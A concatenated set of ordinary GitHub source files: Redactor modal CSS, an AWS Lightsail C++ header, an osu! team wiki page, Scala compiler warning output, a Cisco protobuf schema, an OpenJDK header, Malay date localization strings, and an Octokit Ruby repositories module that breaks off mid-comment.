box-sizing: border-box;
}
& input,
& select,
& textarea {
box-sizing: border-box;
display: block;
width: 100%;
font-family: inherit;
font-size: 16px;
height: 40px;
outline: none;
vertical-align: middle;
background-color: #fff;
border: 1px solid #cacfd4;
border-radius: 0.1875em;
box-shadow: none;
padding: 0 .5em;
}
& textarea {
padding: .5em;
height: auto;
line-height: 1.5;
vertical-align: top;
}
& select {
-webkit-appearance: none;
background-image: url('data:image/svg+xml;utf8,<svg xmlns="http://www.w3.org/2000/svg" width="9" height="12" viewBox="0 0 9 12"><path fill="rgba(0, 0, 0, .4);" d="M0.722,4.823L-0.01,4.1,4.134-.01,4.866,0.716Zm7.555,0L9.01,4.1,4.866-.01l-0.732.726ZM0.722,7.177L-0.01,7.9,4.134,12.01l0.732-.726Zm7.555,0L9.01,7.9,4.866,12.01l-0.732-.726Z"/></svg>');
background-repeat: no-repeat;
background-position: right .65em center;
padding-right: 28px;
}
& select[multiple] {
background-image: none;
height: auto;
padding: .5em .75em;
}
& input[type="file"] {
width: auto;
border: none;
padding: 0;
height: auto;
background: none;
box-shadow: none;
display: inline-block;
}
& input[type="radio"],
& input[type="checkbox"] {
display: inline-block;
width: auto;
height: auto;
padding: 0;
vertical-align: middle;
position: relative;
bottom: 0.15rem;
font-size: 115%;
margin-right: 3px;
}
& .form-item {
margin-bottom: 20px;
}
& .form-item:last-child {
margin-bottom: 0;
}
& fieldset {
border: 1px solid rgba(0, 0, 0, .1);
border-radius: 3px;
padding: 16px;
padding-bottom: 20px;
margin-bottom: 20px;
& .form-item {
margin-bottom: 12px;
}
}
& label {
display: block;
color: #555;
margin-bottom: 0.25em;
font-size: 14px;
& .desc,
& .success,
& .error {
text-transform: none;
font-weight: normal;
}
}
& label.checkbox {
font-size: 16px;
line-height: 1.5;
cursor: pointer;
color: inherit;
}
& .form-checkboxes {
& label.checkbox {
display: inline-block;
margin-right: 1em;
}
}
& input,
& textarea,
& select {
&:hover {
outline: none;
background-color: #fff;
border-color: #969fa9;
box-shadow: none;
}
&:focus {
transition: all linear .2s;
outline: none;
background-color: #fff;
border-color: rgba(#007dff, .5);
box-shadow: 0 0 3px rgba(#007dff, .5);
}
&.error {
background-color: rgba(#ff3265, .1);
border: 1px solid lighten(#ff3265, 15%);
&:focus {
border-color: #ff3265;
box-shadow: 0 0 1px #ff3265;
}
}
&.success {
background-color: rgba(#2fc4b6, .1);
border: 1px solid lighten(#2fc4b6, 15%);
&:focus {
border-color: #2fc4b6;
box-shadow: 0 0 1px #2fc4b6;
}
}
&:disabled,
&.disabled {
&,
&:hover {
resize: none;
opacity: .6;
cursor: default;
font-style: italic;
color: rgba(0, 0, 0, .5);
border: 1px solid #cacfd4;
box-shadow: none;
background-color: #fff;
}
}
}
& .req {
position: relative;
top: 1px;
font-weight: bold;
color: #ff3265;
font-size: 110%;
}
& .desc {
color: rgba(#333, .5);
font-size: 12px;
}
& span.desc {
margin-left: 0.25em;
}
& div.desc {
margin-top: 0.25em;
}
& span.success,
& span.error {
font-size: 12px;
    margin-left: 0.25em;
}
& div.desc {
margin-bottom: -0.5em;
}
& .redactor-close {
position: absolute;
top: 16px;
right: 12px;
font-size: 30px;
line-height: 30px;
padding: 0px 4px;
color: #000;
opacity: .3;
cursor: pointer;
&:hover {
opacity: 1;
}
&:before {
content: '\00d7';
}
}
& button {
display: inline-flex;
align-items: center;
text-decoration: none;
text-align: center;
font-family: inherit;
font-size: 15px;
font-weight: 500;
color: #007dff;
background-color: #fff;
border-radius: 3px;
border: 2px solid #007dff;
min-height: 40px;
outline: none;
padding: 0.5em 1.25em;
cursor: pointer;
line-height: 1.2;
vertical-align: middle;
-webkit-appearance: none;
}
& button:hover {
outline: none;
text-decoration: none;
background: none;
color: rgba(#007dff, .6);
border-color: rgba(#007dff, .5);
}
& button.redactor-button-secondary {
border-color: #2a2e34;
color: #2a2e34;
&:hover {
color: rgba(#2a2e34, .6);
border-color: rgba(#2a2e34, .5);
}
}
& button.redactor-button-danger,
& button.redactor-button-unstyled {
background: none;
border-color: transparent;
color: rgba(#2a2e34, .6);
&:hover {
background: none;
border-color: transparent;
color: #ff3265;
text-decoration: underline;
}
}
& .redactor-modal-group:after {
content: "";
display: table;
clear: both;
}
& .redactor-modal-side {
float: left;
width: 30%;
margin-right: 4%;
& img {
max-width: 100%;
height: auto;
display: block;
}
}
& .redactor-modal-area {
float: left;
width: 66%;
}
}
.redactor-modal[dir="rtl"] {
.redactor-close {
left: 12px;
right: auto;
}
textarea {
direction: ltr;
text-align: left;
}
.redactor-modal-footer button.redactor-button-unstyled {
        float: left;
margin-left: 0;
}
}
.redactor-modal-header {
padding: 20px;
font-size: 18px;
line-height: 24px;
font-weight: bold;
color: #000;
border-bottom: 1px solid rgba(0, 0, 0, .05);
&:empty {
display: none;
}
}
.redactor-modal-body {
padding: 32px 48px;
padding-bottom: 40px;
}
.redactor-modal-footer {
padding: 24px;
border-top: 1px solid rgba(0, 0, 0, .05);
overflow: hidden;
& button {
margin-right: 4px;
}
& button.redactor-button-unstyled {
margin-right: 0;
float: right;
}
&:empty {
display: none;
}
}
.redactor-modal-tabs {
display: flex;
border-bottom: 2px solid rgba(0, 0, 0, .05);
margin-bottom: 1em;
& a {
font-size: 15px;
padding: 2px 0;
text-decoration: none;
color: rgba(0, 0, 0, .5);
border-bottom: 2px solid transparent;
margin-bottom: -2px;
margin-right: 14px;
}
& a:hover {
transition: all linear .2s;
}
& a:hover,
& a.active {
font-weight: 500;
color: #007dff;
border-bottom-color: #007dff;
}
} | {
"pile_set_name": "Github"
} |
/**
* Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
* SPDX-License-Identifier: Apache-2.0.
*/
#pragma once
#include <aws/lightsail/Lightsail_EXPORTS.h>
#include <aws/core/utils/memory/stl/AWSVector.h>
#include <aws/lightsail/model/Operation.h>
#include <utility>
namespace Aws
{
template<typename RESULT_TYPE>
class AmazonWebServiceResult;
namespace Utils
{
namespace Json
{
class JsonValue;
} // namespace Json
} // namespace Utils
namespace Lightsail
{
namespace Model
{
class AWS_LIGHTSAIL_API CreateDiskResult
{
public:
CreateDiskResult();
CreateDiskResult(const Aws::AmazonWebServiceResult<Aws::Utils::Json::JsonValue>& result);
CreateDiskResult& operator=(const Aws::AmazonWebServiceResult<Aws::Utils::Json::JsonValue>& result);
/**
* <p>An array of objects that describe the result of the action, such as the
* status of the request, the timestamp of the request, and the resources affected
* by the request.</p>
*/
inline const Aws::Vector<Operation>& GetOperations() const{ return m_operations; }
/**
* <p>An array of objects that describe the result of the action, such as the
* status of the request, the timestamp of the request, and the resources affected
* by the request.</p>
*/
inline void SetOperations(const Aws::Vector<Operation>& value) { m_operations = value; }
/**
* <p>An array of objects that describe the result of the action, such as the
* status of the request, the timestamp of the request, and the resources affected
* by the request.</p>
*/
inline void SetOperations(Aws::Vector<Operation>&& value) { m_operations = std::move(value); }
/**
* <p>An array of objects that describe the result of the action, such as the
* status of the request, the timestamp of the request, and the resources affected
* by the request.</p>
*/
inline CreateDiskResult& WithOperations(const Aws::Vector<Operation>& value) { SetOperations(value); return *this;}
/**
* <p>An array of objects that describe the result of the action, such as the
* status of the request, the timestamp of the request, and the resources affected
* by the request.</p>
*/
inline CreateDiskResult& WithOperations(Aws::Vector<Operation>&& value) { SetOperations(std::move(value)); return *this;}
/**
* <p>An array of objects that describe the result of the action, such as the
* status of the request, the timestamp of the request, and the resources affected
* by the request.</p>
*/
inline CreateDiskResult& AddOperations(const Operation& value) { m_operations.push_back(value); return *this; }
/**
* <p>An array of objects that describe the result of the action, such as the
* status of the request, the timestamp of the request, and the resources affected
* by the request.</p>
*/
inline CreateDiskResult& AddOperations(Operation&& value) { m_operations.push_back(std::move(value)); return *this; }
private:
Aws::Vector<Operation> m_operations;
};
} // namespace Model
} // namespace Lightsail
} // namespace Aws
| {
"pile_set_name": "Github"
} |
---
no_native_review: true
tags:
- osu! staff
- osu!team
- osu! team
- staff
- team osu!
---
# The Team
*For a list of promotions and departures, see: [Staff Log](/wiki/Staff_Log)*
The people below are the core of the **osu! team** and are primarily responsible for making the game great for everyone.
| Name | Role<!-- TODO: "Featured Artist outreach" isn't a role but I'm not sure how to write it as one... --> |
| :-- | :-- |
| ![][flag_AU] **[peppy](https://osu.ppy.sh/users/2)** | **Project lead** |
| ![][flag_GB] [-Mo-](https://osu.ppy.sh/users/2202163) | Modding and mapping scene advisor |
| ![][flag_US] [Chaos](https://osu.ppy.sh/users/2628870) | Moderation and community advisor |
| ![][flag_AU] [Ephemeral](https://osu.ppy.sh/users/102335) | Project and community maintainer, Featured Artist outreach |
| ![][flag_JP] [flyte](https://osu.ppy.sh/users/3103765) | Design lead, resident Creative Cloud Watcher |
| ![][flag_GB] [JBHyperion](https://osu.ppy.sh/users/4879508) | Modding and mapping scene advisor |
| ![][flag_AR] [juankristal](https://osu.ppy.sh/users/443656) | World Cup organiser and administrator |
| ![][flag_DE] [Mao](https://osu.ppy.sh/users/2204515) | Modding and mapping scene advisor |
| ![][flag_JP] [nanaya](https://osu.ppy.sh/users/2387883) | osu!web developer |
| ![][flag_PH] [Nathanael](https://osu.ppy.sh/users/2295078) | General housekeeper, moderation advisor |
| ![][flag_AU] [nekodex](https://osu.ppy.sh/users/102) | osu!web developer, [official osu! Featured Artist](https://osu.ppy.sh/beatmaps/artists/1) |
| ![][flag_JP] [notbakaneko](https://osu.ppy.sh/users/10751776) | osu!web developer |
| ![][flag_DE] [Okoratu](https://osu.ppy.sh/users/1623405) | Modding and mapping scene advisor |
| ![][flag_US] [pishifat](https://osu.ppy.sh/users/3178418) | Modding and mapping scene advisor, Mappers' Guild organiser, Featured Artist outreach |
| ![][flag_MX] [Repflez](https://osu.ppy.sh/users/201392) | General housekeeper, wiki maintainer |
| ![][flag_FR] [Shiro](https://osu.ppy.sh/users/113005) | General housekeeper |
| ![][flag_AU] [smoogipoo](https://osu.ppy.sh/users/1040328) | osu! developer, osu!mania lover, bug buster |
| ![][flag_US] [Toy](https://osu.ppy.sh/users/2757689) | Project Loved lead, community advisor, Featured Artist outreach |
| ![][flag_ES] [Trosk-](https://osu.ppy.sh/users/3469385) | General housekeeper, tournament assistant |
| ![][flag_AU] [Zallius](https://osu.ppy.sh/users/55) | Endangered species |
## User groups
The following are user groups made up of osu! community members who help keep osu! running. Most of these user groups can be recognised by their forum colours, in-game chat colours, profile titles and/or profile badges.
| Name | Description |
| :-- | :-- |
| [Beatmap Nominators](Beatmap_Nominators) | Users who work hard to ensure your beatmaps become qualified. |
| [Developers](Developers) | Make the game great by adding new features and fixing the bugs. |
| [Global Moderation Team](Global_Moderation_Team) | Keeps an eye on the forums and the in-game chat |
| [Nomination Assessment Team](Nomination_Assessment_Team) | Manages the Beatmap Nominators |
| [osu! Alumni](osu!_Alumni) | Those known for their contributions who have since moved on |
| [Project Loved Team](Project_Loved_Team) | Discovers and keeps track of the beatmaps that the community loves the most. |
| [Support Team](Support_Team) | Help / feature request support |
## Inactive core team members
| Name | Role |
| :-- | :-- |
| ![][flag_US] [awp](https://osu.ppy.sh/users/2650) | General housekeeper and helper, chibi artist. [Barrel Roll Weekly](http://brw.twinkfish.com/) |
| ![][flag_NO] [cYsmix](https://osu.ppy.sh/users/272870) | Sound designer, [official osu! Featured Artist](https://osu.ppy.sh/beatmaps/artists/2) |
| ![][flag_NZ] [deadbeat](https://osu.ppy.sh/users/128370) | World Cup organiser and administrator |
| ![][flag_US] [Derekku](https://osu.ppy.sh/users/91341) | General housekeeper, community manager |
| ![][flag_NZ] [Echo](https://osu.ppy.sh/users/431) | osu! developer, provider of IRC integration for the in-game chat, website maintainer. [Blog](http://blog.echo.sh/) |
| ![][flag_US] [HappyStick](https://osu.ppy.sh/users/256802) | osu! Coffee Hour host, World Cup streamer, tournament organiser |
| ![][flag_NL] [Intermezzo](https://osu.ppy.sh/users/136842) | osu! developer, provider of the osz2 and p2p backend |
| ![][flag_US] Jim | Original site designer. [Brand New Games](http://www.bravegamer.com/) |
| ![][flag_DE] [Loctav](https://osu.ppy.sh/users/71366) | World Cup organiser and administrator, QAT lead, community manager |
| ![][flag_US] [LuigiHann](https://osu.ppy.sh/users/1079) | Epic skin designer, contributor to the default skin and icon set. [DeviantArt](https://luigihann.deviantart.com/) |
| ![][flag_US] [mm201](https://osu.ppy.sh/users/30655) | osu! developer, creator of mm sliders |
| ![][flag_US] [nuudles](https://osu.ppy.sh/users/21312) | osu! iPhone developer |
| ![][flag_US] [Nyquill](https://osu.ppy.sh/users/682935) | osu! developer, Mappers' Guild organiser |
| ![][flag_US] Phil | Forum designer |
| ![][flag_US] [RBRat3](https://osu.ppy.sh/users/307202) | osu!painter, cool stuff maker-guy extraordinaire |
| ![][flag_US] [Sarumaru](https://osu.ppy.sh/users/9427) | Original Pippi concept and artwork designer. [DeviantArt](https://sarumaru.deviantart.com/) |
| ![][flag_GR] [Sinistro](https://osu.ppy.sh/users/5530) | Early community manager and leader, meeting minutes and FAQ contributor |
| ![][flag_DE] [Tom94](https://osu.ppy.sh/users/1857058) | osu! and pp developer |
| ![][flag_CN] [woc2006](https://osu.ppy.sh/users/1105845) | osu! developer, osu!mania mode developer |
| ![][flag_JP] [yelle](https://osu.ppy.sh/users/4916903) | [osu!store](https://osu.ppy.sh/store/listing) lead |
| ![][flag_US] [ztrot](https://osu.ppy.sh/users/6347) | [osu!academy](/wiki/osu!academy) professor, media and character designer |
[flag_AR]: /wiki/shared/flag/AR.gif "Argentina"
[flag_AU]: /wiki/shared/flag/AU.gif "Australia"
[flag_DE]: /wiki/shared/flag/DE.gif "Germany"
[flag_ES]: /wiki/shared/flag/ES.gif "Spain"
[flag_FR]: /wiki/shared/flag/FR.gif "France"
[flag_NZ]: /wiki/shared/flag/NZ.gif "New Zealand"
[flag_NL]: /wiki/shared/flag/NL.gif "Netherlands"
[flag_US]: /wiki/shared/flag/US.gif "United States"
[flag_NO]: /wiki/shared/flag/NO.gif "Norway"
[flag_PH]: /wiki/shared/flag/PH.gif "Philippines"
[flag_CN]: /wiki/shared/flag/CN.gif "China"
[flag_GR]: /wiki/shared/flag/GR.gif "Greece"
[flag_JP]: /wiki/shared/flag/JP.gif "Japan"
[flag_MX]: /wiki/shared/flag/MX.gif "Mexico"
[flag_GB]: /wiki/shared/flag/GB.gif "United Kingdom"
| {
"pile_set_name": "Github"
} |
unchecked2.scala:4: warning: fruitless type test: a value of type Some[List[Int]] cannot also be a Option[List[String]] (but still might match its erasure)
/* warn */ Some(List(1)).isInstanceOf[Option[List[String]]]
^
unchecked2.scala:5: warning: non-variable type argument Option[_] in type Option[Option[_]] is unchecked since it is eliminated by erasure
/* warn */ Some(123).isInstanceOf[Option[Option[_]]]
^
unchecked2.scala:6: warning: fruitless type test: a value of type Some[Int] cannot also be a Option[String] (but still might match its erasure)
/* warn */ Some(123).isInstanceOf[Option[String]]
^
unchecked2.scala:7: warning: fruitless type test: a value of type Some[Int] cannot also be a Option[List[String]] (but still might match its erasure)
/* warn */ Some(123).isInstanceOf[Option[List[String]]]
^
unchecked2.scala:8: warning: fruitless type test: a value of type Some[Int] cannot also be a Option[List[Int => String]] (but still might match its erasure)
/* warn */ Some(123).isInstanceOf[Option[List[Int => String]]]
^
unchecked2.scala:9: warning: fruitless type test: a value of type Some[Int] cannot also be a Option[(String, Double)] (but still might match its erasure)
/* warn */ Some(123).isInstanceOf[Option[(String, Double)]]
^
unchecked2.scala:10: warning: fruitless type test: a value of type Some[Int] cannot also be a Option[String => Double] (but still might match its erasure)
/* warn */ Some(123).isInstanceOf[Option[String => Double]]
^
unchecked2.scala:14: warning: non-variable type argument List[String] in type Option[List[String]] is unchecked since it is eliminated by erasure
/* warn */ (Some(List(1)): Any).isInstanceOf[Option[List[String]]]
^
unchecked2.scala:15: warning: non-variable type argument Int in type Option[Int] is unchecked since it is eliminated by erasure
/* warn */ (Some(123): Any).isInstanceOf[Option[Int]]
^
unchecked2.scala:16: warning: non-variable type argument String in type Option[String] is unchecked since it is eliminated by erasure
/* warn */ (Some(123): Any).isInstanceOf[Option[String]]
^
unchecked2.scala:17: warning: non-variable type argument List[String] in type Option[List[String]] is unchecked since it is eliminated by erasure
/* warn */ (Some(123): Any).isInstanceOf[Option[List[String]]]
^
unchecked2.scala:18: warning: non-variable type argument List[Int => String] in type Option[List[Int => String]] is unchecked since it is eliminated by erasure
/* warn */ (Some(123): Any).isInstanceOf[Option[List[Int => String]]]
^
unchecked2.scala:19: warning: non-variable type argument (String, Double) in type Option[(String, Double)] is unchecked since it is eliminated by erasure
/* warn */ (Some(123): Any).isInstanceOf[Option[(String, Double)]]
^
unchecked2.scala:20: warning: non-variable type argument String => Double in type Option[String => Double] is unchecked since it is eliminated by erasure
/* warn */ (Some(123): Any).isInstanceOf[Option[String => Double]]
^
error: No warnings can be incurred under -Xfatal-warnings.
14 warnings found
one error found
| {
"pile_set_name": "Github"
} |
// Copyright (c) 2015, Cisco Systems
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions
// are met:
//
// 1. Redistributions of source code must retain the above copyright notice,
// this list of conditions and the following disclaimer.
//
// 2. Redistributions in binary form must reproduce the above copyright
// notice, this list of conditions and the following disclaimer in the
// documentation and/or other materials provided with the distribution.
//
// 3. Neither the name of the copyright holder nor the names of its
// contributors may be used to endorse or promote products derived
// from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
// TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
// PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
// EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
// PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
// PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
// LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
// NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
// SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
// This file is autogenerated
//
// The following edits are possible, without affecting the validity of the
// file:
//
// * Fields may be renamed.
// * Fields may be deleted.
// * The unique numbered tag for a field may be changed, provided that
// the ordering of tags for fields within a message is preserved.
// * Message types may be renamed.
// * Message types may be deleted (if all fields that reference them
// have been deleted).
//
// All Cisco message and field extensions must be preserved (except when the
// field itself is being deleted).
syntax = "proto3";
package cisco_ios_xr_spirit_install_instmgr_oper.software_install.issu.inventory;
// ISSU Inventory Information all nodes
message isd_inv_info_container_KEYS {
}
message isd_inv_info_container {
repeated isd_inv_info_st invinfo = 50;
}
message isd_inv_info_st {
// Node ID
sint32 node_id = 1;
// Node Type
string node_type = 2;
// ISSU Node Role
string issu_node_role = 3;
// Node State
string node_state = 4;
// Node role
string node_role = 5;
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2005, 2010, Oracle and/or its affiliates. All rights reserved.
* Copyright (c) 2014, Red Hat Inc. All rights reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundation.
*
* This code is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* version 2 for more details (a copy is included in the LICENSE file that
* accompanied this code).
*
* You should have received a copy of the GNU General Public License version
* 2 along with this work; if not, write to the Free Software Foundation,
* Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*
* Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
* or visit www.oracle.com if you need additional information or have any
* questions.
*
*/
#ifndef CPU_AARCH64_VM_C1_FPUSTACKSIM_HPP
#define CPU_AARCH64_VM_C1_FPUSTACKSIM_HPP
// No FPU stack on AARCH64
class FpuStackSim;
#endif // CPU_AARCH64_VM_C1_FPUSTACKSIM_HPP
| {
"pile_set_name": "Github"
} |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Day names
weekday-0-long = Ahad
weekday-1-long = Isnin
weekday-2-long = Selasa
weekday-3-long = Rabu
weekday-4-long = Khamis
weekday-5-long = Jumaat
weekday-6-long = Sabtu
weekday-0-short = Ahad
weekday-1-short = Isnin
weekday-2-short = Selasa
weekday-3-short = Rabu
weekday-4-short = Khamis
weekday-5-short = Jumaat
weekday-6-short = Sabtu
# Month names
month-0-long = Januari
month-1-long = Februari
month-2-long = Mac
month-3-long = April
month-4-long = Mei
month-5-long = Jun
month-6-long = Julai
month-7-long = Ogos
month-8-long = September
month-9-long = Oktober
month-10-long = November
month-11-long = Disember
month-0-genitive = Januari
month-1-genitive = Februari
month-2-genitive = Mac
month-3-genitive = April
month-4-genitive = Mei
month-5-genitive = Jun
month-6-genitive = Julai
month-7-genitive = Ogos
month-8-genitive = September
month-9-genitive = Oktober
month-10-genitive = November
month-11-genitive = Disember
month-0-short = Jan
month-1-short = Feb
month-2-short = Mac
month-3-short = Apr
month-4-short = Mei
month-5-short = Jun
month-6-short = Jul
month-7-short = Ogos
month-8-short = Sep
month-9-short = Okt
month-10-short = Nov
month-11-short = Dis
# Relative time ("pretty dates"), normal/long variant
minutes-ago-long={[ plural(value) ]}
minutes-ago-long[zero] = sebentar tadi
minutes-ago-long[one] = satu minit lalu
minutes-ago-long[two] = {{value}} minit lalu
minutes-ago-long[few] = {{value}} minit lalu
minutes-ago-long[many] = {{value}} minit lalu
minutes-ago-long[other] = {{value}} minit lalu
hours-ago-long={[ plural(value) ]}
hours-ago-long[zero] = sebentar tadi
hours-ago-long[one] = sejam yang lalu
hours-ago-long[two] = {{value}} jam lalu
hours-ago-long[few] = {{value}} jam lalu
hours-ago-long[many] = {{value}} jam lalu
hours-ago-long[other] = {{value}} jam lalu
days-ago-long={[ plural(value) ]}
days-ago-long[zero] = hari ini
days-ago-long[one] = semalam
days-ago-long[two] = {{value}} hari lalu
days-ago-long[few] = {{value}} hari lalu
days-ago-long[many] = {{value}} hari lalu
days-ago-long[other] = {{value}} hari lalu
weeks-ago-long={[ plural(value) ]}
weeks-ago-long[zero] = minggu ini
weeks-ago-long[one] = minggu lalu
weeks-ago-long[two] = {{value}} minggu lalu
weeks-ago-long[few] = {{value}} minggu lalu
weeks-ago-long[many] = {{value}} minggu lalu
weeks-ago-long[other] = {{value}} minggu lalu
months-ago-long={[ plural(value) ]}
months-ago-long[zero] = bulan ini
months-ago-long[one] = bulan lalu
months-ago-long[two] = {{value}} bulan lalu
months-ago-long[few] = {{value}} bulan lalu
months-ago-long[many] = {{value}} bulan lalu
months-ago-long[other] = {{value}} bulan lalu
years-ago-long={[ plural(value) ]}
years-ago-long[zero] = tahun ini
years-ago-long[one] = tahun lalu
years-ago-long[two] = {{value}} tahun lalu
years-ago-long[few] = {{value}} tahun lalu
years-ago-long[many] = {{value}} tahun lalu
years-ago-long[other] = {{value}} tahun lalu
minutes-until-long={[ plural(value) ]}
minutes-until-long[zero] = sekarang
minutes-until-long[one] = dalam satu minit
minutes-until-long[two] = dalam {{value}} minit
minutes-until-long[few] = dalam {{value}} minit
minutes-until-long[many] = dalam {{value}} minit
minutes-until-long[other] = dalam {{value}} minit
hours-until-long={[ plural(value) ]}
hours-until-long[zero] = sekarang
hours-until-long[one] = dalam satu jam
hours-until-long[two] = dalam {{value}} jam
hours-until-long[few] = dalam {{value}} jam
hours-until-long[many] = dalam {{value}} jam
hours-until-long[other] = dalam {{value}} jam
days-until-long={[ plural(value) ]}
days-until-long[zero] = hari ini
days-until-long[one] = esok
days-until-long[two] = dalam {{value}} hari
days-until-long[few] = dalam {{value}} hari
days-until-long[many] = dalam {{value}} hari
days-until-long[other] = dalam {{value}} hari
weeks-until-long={[ plural(value) ]}
weeks-until-long[zero] = minggu ini
weeks-until-long[one] = minggu depan
weeks-until-long[two] = dalam {{value}} minggu
weeks-until-long[few] = dalam {{value}} minggu
weeks-until-long[many] = dalam {{value}} minggu
weeks-until-long[other] = dalam {{value}} minggu
months-until-long={[ plural(value) ]}
months-until-long[zero] = bulan ini
months-until-long[one] = bulan depan
months-until-long[two] = dalam {{value}} bulan
months-until-long[few] = dalam {{value}} bulan
months-until-long[many] = dalam {{value}} bulan
months-until-long[other] = dalam {{value}} bulan
years-until-long={[ plural(value) ]}
years-until-long[zero] = tahun ini
years-until-long[one] = tahun depan
years-until-long[two] = dalam {{value}} tahun
years-until-long[few] = dalam {{value}} tahun
years-until-long[many] = dalam {{value}} tahun
years-until-long[other] = dalam {{value}} tahun
# Relative time ("pretty dates"), short variant
# LOCALIZATION NOTE: the time unit should be as short as possible,
# and the whole string should not exceed a length of ~10 latin characters.
# LOCALIZATION NOTE: the prime (’) can be used to represent minutes for most
# locales, but we use “m” instead for the English locale to prevent a possible
# confusion (35’ ago ≠ 35 feet ago).
minutes-ago-short={[ plural(value) ]}
minutes-ago-short[zero] = sebentar tadi
minutes-ago-short[other] = {{value}} minit lalu
hours-ago-short={[ plural(value) ]}
hours-ago-short[zero] = sebentar tadi
hours-ago-short[other] = {{value}} jam lalu
days-ago-short={[ plural(value) ]}
days-ago-short[zero] = hari ini
days-ago-short[other] = {{value}} hari lalu
minutes-until-short={[ plural(value) ]}
minutes-until-short[zero] = sekarang
minutes-until-short[other] = dalam {{value}} minit
hours-until-short={[ plural(value) ]}
hours-until-short[zero] = sekarang
hours-until-short[other] = dalam {{value}} jam
days-until-short={[ plural(value) ]}
days-until-short[zero] = hari ini
days-until-short[other] = dalam {{value}} hari
# Relative time ("pretty dates"), unexpected error
incorrectDate = (tarikh tidak betul)
# Date/Time format
# see http://pubs.opengroup.org/onlinepubs/007908799/xsh/strftime.html
dateTimeFormat_%c = %a %b %e %Y %I:%M:%S %p
dateTimeFormat_%x = %m/%d/%Y
dateTimeFormat_%X = %I:%M:%S %p
shortTimeFormat = %I:%M %p
shortDateTimeFormat = %x %I:%M %p
# Boolean to indicate if weekStarts on Monday (1) or Sunday (0).
weekStartsOnMonday = 0
# Localize "AM" and "PM" used in %p format for time
time_am = PG
time_pm = PTG
| {
"pile_set_name": "Github"
} |
module Octokit
class Client
# Methods for the Repositories API
#
# @see https://developer.github.com/v3/repos/
module Repositories
# Check if a repository exists
#
# @see https://developer.github.com/v3/repos/#get
# @param repo [Integer, String, Hash, Repository] A GitHub repository
      # @return [Boolean] true if the repository exists, false otherwise
def repository?(repo, options = {})
!!repository(repo, options)
rescue Octokit::InvalidRepository
false
rescue Octokit::NotFound
false
end
# Get a single repository
#
# @see https://developer.github.com/v3/repos/#get
# @param repo [Integer, String, Hash, Repository] A GitHub repository
# @return [Sawyer::Resource] Repository information
def repository(repo, options = {})
get Repository.path(repo), options
end
alias :repo :repository
# Edit a repository
#
# @see https://developer.github.com/v3/repos/#edit
# @param repo [String, Hash, Repository] A GitHub repository
# @param options [Hash] Repository information to update
# @option options [String] :name Name of the repo
# @option options [String] :description Description of the repo
# @option options [String] :homepage Home page of the repo
# @option options [String] :private `true` makes the repository private, and `false` makes it public.
# @option options [String] :has_issues `true` enables issues for this repo, `false` disables issues.
# @option options [String] :has_wiki `true` enables wiki for this repo, `false` disables wiki.
# @option options [String] :has_downloads `true` enables downloads for this repo, `false` disables downloads.
# @option options [String] :default_branch Update the default branch for this repository.
# @return [Sawyer::Resource] Repository information
def edit_repository(repo, options = {})
repo = Repository.new(repo)
options[:name] ||= repo.name
patch "repos/#{repo}", options
end
alias :edit :edit_repository
alias :update_repository :edit_repository
alias :update :edit_repository
# List user repositories
#
# If user is not supplied, repositories for the current
# authenticated user are returned.
#
# @note If the user provided is a GitHub organization, only the
# organization's public repositories will be listed. For retrieving
# organization repositories the {Organizations#organization_repositories}
# method should be used instead.
# @see https://developer.github.com/v3/repos/#list-your-repositories
# @see https://developer.github.com/v3/repos/#list-user-repositories
# @param user [Integer, String] Optional GitHub user login or id for which
# to list repos.
# @return [Array<Sawyer::Resource>] List of repositories
def repositories(user=nil, options = {})
paginate "#{User.path user}/repos", options
end
alias :list_repositories :repositories
alias :list_repos :repositories
alias :repos :repositories
# List all repositories
#
# This provides a dump of every repository, in the order that they were
# created.
#
# @see https://developer.github.com/v3/repos/#list-all-public-repositories
#
# @param options [Hash] Optional options
# @option options [Integer] :since The integer ID of the last Repository
# that you’ve seen.
# @return [Array<Sawyer::Resource>] List of repositories.
def all_repositories(options = {})
paginate 'repositories', options
end
# Star a repository
#
# @param repo [String, Hash, Repository] A GitHub repository
# @return [Boolean] `true` if successfully starred
# @see https://developer.github.com/v3/activity/starring/#star-a-repository
def star(repo, options = {})
boolean_from_response :put, "user/starred/#{Repository.new(repo)}", options
end
# Unstar a repository
#
# @param repo [String, Hash, Repository] A GitHub repository
# @return [Boolean] `true` if successfully unstarred
